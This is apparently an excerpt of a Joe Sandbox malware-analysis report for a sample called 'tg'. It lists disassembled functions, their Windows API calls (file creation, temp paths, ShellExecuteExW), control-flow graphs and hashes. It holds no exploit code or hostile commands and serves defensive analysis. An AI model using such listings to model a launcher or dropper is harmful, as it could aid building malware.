                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403468
                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403471
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                                      • String ID: sysnative
                                      • API String ID: 3406704365-821172135
                                      • Opcode ID: e5455a9928b97281f132b1c2dd1bbabf065e779dbb70284d860f41b952fb8df8
                                      • Instruction ID: 2364f58bb10a159e0aa11294c57d56a9f179ba7a21fd77f55822fae8b4f54734
                                      • Opcode Fuzzy Hash: e5455a9928b97281f132b1c2dd1bbabf065e779dbb70284d860f41b952fb8df8
                                      • Instruction Fuzzy Hash: F5514075518701AAD600BBB2CC82B2F76A9AFD0709F10CC3FF544790D2CA7CD8599A6E
                                      Function 00401000 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 0040100F
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                                      • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                        • Part of subcall function 0040DE30: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
                                        • Part of subcall function 0040DE30: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47
                                        • Part of subcall function 00409B40: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49
                                        • Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(004186D0,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691
                                        • Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
                                        • Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                                        • Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D
                                        • Part of subcall function 004053BB: InitializeCriticalSection.KERNEL32(004186A8,0040107B,00000000,00001000,00000000,00000000), ref: 004053C0
                                      • GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
                                        • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
                                        • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
                                        • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82
                                        • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A418
                                        • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A431
                                        • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A43B
                                        • Part of subcall function 0040A348: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A35B
                                        • Part of subcall function 0040A348: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A370
                                        • Part of subcall function 0040DBCA: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
                                        • Part of subcall function 0040DBCA: memset.MSVCRT ref: 0040DC35
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                        • Part of subcall function 00401B8F: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
                                        • Part of subcall function 00401B8F: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
                                        • Part of subcall function 00401B8F: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2
                                      • HeapDestroy.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011B5
                                      • ExitProcess.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011BA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorHandleLastLibrarySectionValue$CommonControlsDestroyEnumExitInitLoadModuleProcessResourceTypes
                                      • String ID: .pA$:pA
                                      • API String ID: 2062415080-1142403416
                                      • Opcode ID: aeb853c391caed1c2c3882624e056ccfb4376f2f5b63a4476772703c942bec8d
                                      • Instruction ID: 59fd392a0a4490bdbbe753bcbaae00d60dcbf108960a32b110b84fea6de29b28
                                      • Opcode Fuzzy Hash: aeb853c391caed1c2c3882624e056ccfb4376f2f5b63a4476772703c942bec8d
                                      • Instruction Fuzzy Hash: 6C313070A80704A9D210B7F29D43F9E3A25AB1874DF51843FB644790E3CEBC55489A6F
                                      Function 00403DF3 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 640COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 281 403df3-403df4 282 403df9-403e04 281->282 282->282 283 403e06-403e1c call 40dfc0 282->283 286 403e1e-403e26 283->286 287 403e28-403e8a call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 286->287 288 403e8c-403e9d 286->288 287->286 287->288 290 403e9f-403ea7 288->290 292 403ea9-403f0b call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 290->292 293 403f0d-403f1e 290->293 292->290 292->293 296 403f20-403f28 293->296 299 403f2a-403f8c call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 296->299 300 403f8e-403f9f 296->300 299->296 299->300 304 403fa1-403fa9 300->304 308 403fab-40400d call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 304->308 309 40400f-404020 304->309 308->304 308->309 314 404022-40402a 309->314 319 404090-4040a1 314->319 320 40402c-404086 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 314->320 326 4040a3-4040ab 319->326 441 40408b-40408e 320->441 332 404115-404126 326->332 333 4040ad-404113 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 326->333 335 404128-404130 332->335 333->326 333->332 343 404132-404198 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 335->343 344 40419a-4041ab 335->344 343->335 343->344 353 4041ad-4041b5 344->353 362 4041b7-404215 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 353->362 363 40421f-404230 353->363 466 40421a-40421d 362->466 373 404232-40423a 363->373 383 4042a4-4044ef call 40de80 call 40e020 * 2 call 40dec0 call 40de80 call 403275 call 40dec0 call 40985e GetModuleHandleW call 40de80 * 4 call 40d100 call 405182 call 405eb0 call 40dec0 call 40de80 * 4 call 40d100 call 405182 call 405eb0 call 40dec0 call 402e9d call 40de80 call 4021a4 call 4051a0 call 40195b call 40460e call 40de80 call 405100 call 40358d call 40dec0 PathRemoveBackslashW call 40213e call 40de80 * 2 call 402bfa call 40e080 call 405182 call 4098c0 call 4051a0 call 40de80 call 40e020 * 2 call 40dec0 call 40de80 call 401e55 call 40dec0 call 403855 call 40de80 call 40e020 call 40dec0 PathQuoteSpacesW call 40de80 call 40e020 * 3 call 40dec0 PathQuoteSpacesW 373->383 384 40423c-4042a2 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 373->384 573 4044f1-404507 call 405492 383->573 574 404509-40450d call 402ca9 383->574 384->373 384->383 441->314 441->319 466->353 466->363 578 404512-404596 call 40de80 * 2 call 40e020 * 3 call 40e080 call 40de80 * 2 call 40a7f5 call 40e080 call 40de80 call 40e020 * 2 call 405182 * 3 call 402022 573->578 574->578 612 40459b-40460d call 4051a0 call 401fa9 call 40df50 * 10 578->612
                                      APIs
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                        • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(008C0000,00000000,?,?), ref: 0040DF1C
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,008C8F58,00000000,00000000), ref: 004042FB
                                      • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004043F4
                                        • Part of subcall function 00402BFA: GetShortPathNameW.KERNEL32(008C8F58,008C8F58,00002710), ref: 00402C34
                                        • Part of subcall function 0040E080: TlsGetValue.KERNEL32(0000000D,?,?,00401DCE,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E08A
                                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                        • Part of subcall function 004098C0: SetEnvironmentVariableW.KERNELBASE(008C8F58,008C8F58,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                        • Part of subcall function 00401E55: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00404476,00000000,00000000,00000000,008C8F58,008C8968,00000000,00000000), ref: 00401E8A
                                      • PathQuoteSpacesW.SHLWAPI(00000000,00000001,008C89E0,00000000,00000000,00000000,00000000,00000000,008C8F58,008C8968,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004044A7
                                      • PathQuoteSpacesW.SHLWAPI(00000000,00000000,00000000,0041702A,00000000,00000000,00000000,00000001,008C89E0,00000000,00000000,00000000,00000000,00000000,008C8F58,008C8968), ref: 004044E1
                                        • Part of subcall function 00405492: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,008C8F58), ref: 004054AB
                                        • Part of subcall function 00405492: EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
                                        • Part of subcall function 00405492: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
                                        • Part of subcall function 00405492: CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
                                        • Part of subcall function 00405492: LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Path$Value$QuoteSpaces$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseCreateEnterEnvironmentLeaveModuleNameObjectRemoveShortSingleThreadVariableWaitwcslen
                                      • String ID: *pA$*pA$pA
                                      • API String ID: 1881381519-978732049
                                      • Opcode ID: ce5de05abebdf408f752614a87581667f3532eea130c2f8d7aa08e5aeff42770
                                      • Instruction ID: c37fc5d70f496ddafb25d76fc072764247fdd107690a54ecab0fee76e679e4b9
                                      • Opcode Fuzzy Hash: ce5de05abebdf408f752614a87581667f3532eea130c2f8d7aa08e5aeff42770
                                      • Instruction Fuzzy Hash: 452219B5504700AED200BBB2D981A7F77BDEB94709F10CD3FF544AA192CA3CD8499B69
                                      Function 0040A756 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                        • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(008C0000,00000000,?,?), ref: 0040E2C7
                                      • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A76D
                                      • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A77A
                                      • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A78C
                                      • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A799
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A79E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                      • String ID: GetLongPathNameW$Kernel32.DLL
                                      • API String ID: 820969696-2943376620
                                      • Opcode ID: b8ec294df8f0a0b8a7015009ae644d8128c9ee2ea3c72b3c91f3911898e9698a
                                      • Instruction ID: 045e3bd93f30ce5257affd3ba06db84d60efd2c3f80f990f00f7183b84a9fd71
                                      • Opcode Fuzzy Hash: b8ec294df8f0a0b8a7015009ae644d8128c9ee2ea3c72b3c91f3911898e9698a
                                      • Instruction Fuzzy Hash: C0F0BE722052147FC2212BBAAC4CDAB3E7CDE96752700413AF905E2252EA79881082BD
                                      Function 0040AAC0 Relevance: 9.2, APIs: 6, Instructions: 157filememoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 646 40aac0-40aad6 647 40aae0-40aaf3 call 40d498 646->647 648 40aad8 646->648 651 40aca2-40acab 647->651 652 40aaf9-40ab00 647->652 648->647 653 40ab02-40ab0a 652->653 654 40ab3e-40ab41 652->654 655 40ab11-40ab17 653->655 656 40ab0c 653->656 657 40ab43-40ab4b 654->657 658 40ab7c-40ab7f 654->658 661 40ab19 655->661 662 40ab1c-40ab39 CreateFileW 655->662 656->655 663 40ab52-40ab58 657->663 664 40ab4d 657->664 659 40ab81-40ab8d 658->659 660 40abe8 658->660 665 40ab98-40ab9e 659->665 666 40ab8f-40ab94 659->666 667 40abec-40abef 660->667 661->662 662->667 668 40ab5a 663->668 669 40ab5d-40ab7a CreateFileW 663->669 664->663 670 40aba0-40aba3 665->670 671 40aba7-40abc7 CreateFileW 665->671 666->665 672 40abf5-40abf7 667->672 673 40ac8b 667->673 668->669 669->667 670->671 671->672 674 40abc9-40abe6 CreateFileW 671->674 672->673 676 40abfd-40ac04 672->676 675 40ac8f-40ac92 673->675 674->667 677 40ac94 675->677 678 40ac96-40ac9d call 40d40a 675->678 679 40ac22 676->679 680 40ac06-40ac0c 676->680 677->678 678->651 683 40ac25-40ac52 679->683 680->679 682 40ac0e-40ac20 HeapAlloc 680->682 682->683 684 40ac70-40ac79 683->684 685 40ac54-40ac5a 683->685 687 40ac7b 684->687 688 40ac7d-40ac7f 684->688 685->684 686 40ac5c-40ac6a SetFilePointer 685->686 686->684 687->688 688->675 689 40ac81-40ac8a 688->689
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB31
                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB72
                                      • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040ABBC
                                      • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040ABDE
                                      • HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040AC17
                                      • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040AC6A
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: File$Create$AllocHeapPointer
                                      • String ID:
                                      • API String ID: 4207849991-0
                                      • Opcode ID: b3501de1549189c44e7e631b90cb851d7740b4e923cfc5c59c52eca9f0755e35
                                      • Instruction ID: b1ded5e7b3c1179952fb066da43177db28dec5f90817629197f40925782b5e59
                                      • Opcode Fuzzy Hash: b3501de1549189c44e7e631b90cb851d7740b4e923cfc5c59c52eca9f0755e35
                                      • Instruction Fuzzy Hash: 1F51C0712483006BE3218F19DD44B6B7BF6EB44764F204A3AFA51A73E0D678EC55874A
                                      Function 0040D819 Relevance: 7.6, APIs: 5, Instructions: 106memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 690 40d819-40d838 691 40d83a-40d83c 690->691 692 40d83e-40d840 690->692 691->692 693 40d8f2-40d905 RtlAllocateHeap 692->693 694 40d846-40d84b 692->694 696 40d907-40d925 693->696 697 40d93d-40d943 693->697 695 40d850 call 40da43 694->695 698 40d855-40d869 EnterCriticalSection 695->698 699 40d930-40d937 InitializeCriticalSection 696->699 700 40d927-40d929 696->700 701 40d877-40d879 698->701 699->697 700->699 702 40d92b-40d92e 700->702 703 40d86b-40d86e 701->703 704 40d87b 701->704 702->697 705 40d870-40d873 703->705 706 40d875 703->706 707 40d887-40d89b HeapAlloc 704->707 705->706 708 40d87d-40d885 705->708 706->701 709 40d8e5-40d8f0 LeaveCriticalSection 707->709 710 40d89d-40d8af call 40d819 707->710 708->707 708->709 709->697 712 40d8b4-40d8b8 710->712 712->709 713 40d8ba-40d8da 712->713 714 40d8dc 713->714 715 40d8df 713->715 714->715 715->709
                                      APIs
                                      • EnterCriticalSection.KERNEL32(00418624,0041861C,0040D9E2,00000000,FFFFFFED,00000200,76ED5E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D85A
                                      • HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040D891
                                      • LeaveCriticalSection.KERNEL32(00418624,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D8EA
                                      • RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,76ED5E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D8FB
                                      • InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D937
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
                                      • String ID:
                                      • API String ID: 1272335518-0
                                      • Opcode ID: f6530bd1139fc1308a1eb69ae95df56e95dab55b3f4bf4e911806d1cb07516e8
                                      • Instruction ID: b7a84fb5e76b6252515cea3da09f74f38e7866411a6d0cfbb28ace0a8fd55691
                                      • Opcode Fuzzy Hash: f6530bd1139fc1308a1eb69ae95df56e95dab55b3f4bf4e911806d1cb07516e8
                                      • Instruction Fuzzy Hash: 7B31AEB2E007069FC3209F95D844A56BBF5FB44714B15C67EE465A77A0CB38E908CF98
                                      Function 0040A96C Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 716 40a96c-40a989 SHGetFolderLocation 717 40a98b-40a997 SHGetPathFromIDListW 716->717 718 40a9be-40a9cb 716->718 719 40a9b5-40a9b8 CoTaskMemFree 717->719 720 40a999-40a9a4 wcslen 717->720 719->718 720->719 721 40a9a6-40a9ae 720->721 721->719 722 40a9b0-40a9b4 721->722 722->719
                                      APIs
                                      • SHGetFolderLocation.SHELL32(00000000,008C8F58,00000000,00000000,00000000,00000000,00000000,?,00000104,0040A91B,00000000,00000000,00000104,?), ref: 0040A97E
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040A98F
                                      • wcslen.MSVCRT ref: 0040A99A
                                      • CoTaskMemFree.OLE32(00000000,?,00000104,0040A91B,00000000,00000000,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000), ref: 0040A9B8
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: FolderFreeFromListLocationPathTaskwcslen
                                      • String ID:
                                      • API String ID: 4012708801-0
                                      • Opcode ID: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
                                      • Instruction ID: 15676ea375ba95ce47a4ad1d62f3a4f85f84cc5ccd71b7d74cdbb22097095955
                                      • Opcode Fuzzy Hash: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
                                      • Instruction Fuzzy Hash: 51F0D136610614BAC7205B6ADD08DAB7B78EF06660B414126F805E6250E7308920C7E5
                                      Function 00402022 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 723 402022-402024 724 402029-402034 723->724 724->724 725 402036-4020ac call 40dfc0 call 405060 * 3 ShellExecuteExW 724->725 734 4020b0-4020cd call 405532 GetExitCodeProcess 725->734 737 4020dd 734->737 738 4020cf-4020d9 734->738 737->734 738->737 739 4020db-402106 call 40df50 * 3 738->739
                                      APIs
                                      • ShellExecuteExW.SHELL32(?), ref: 004020A7
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 004020C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CodeExecuteExitProcessShell
                                      • String ID: open
                                      • API String ID: 1016612177-2758837156
                                      • Opcode ID: 4fb2f0ec770fda151a68555488377ed97fba283763a87ea546f97f21bf454217
                                      • Instruction ID: 2b8263a944a9b57d4591781c670f1b736d97a98816e9e989756960c1ab26e777
                                      • Opcode Fuzzy Hash: 4fb2f0ec770fda151a68555488377ed97fba283763a87ea546f97f21bf454217
                                      • Instruction Fuzzy Hash: 66219D71008309AFD700EF54C855A9FBBE8EF44304F10882EF299E2291DB79D909CF96
